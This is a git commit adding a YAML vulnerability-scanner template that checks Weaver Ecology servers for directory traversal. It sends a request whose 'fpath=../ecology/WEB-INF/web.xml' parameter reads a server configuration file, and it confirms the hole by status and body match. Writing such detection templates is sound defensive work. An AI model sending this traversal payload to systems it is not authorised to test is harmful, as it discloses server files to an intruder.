Create ecology-filedownload-directory-traversal.yaml

patch-1
Prince Chaddha 2021-04-23 18:50:11 +05:30 committed by GitHub
parent f10fcbcf2f
commit 85bc6464cb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions

View File

@ -0,0 +1,20 @@
id: ecology-filedownload-directory-traversal
info:
name: Ecology Directory Traversal
author: princechaddha
severity: medium
tags: ecology,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<url-pattern>/weaver/"
part: body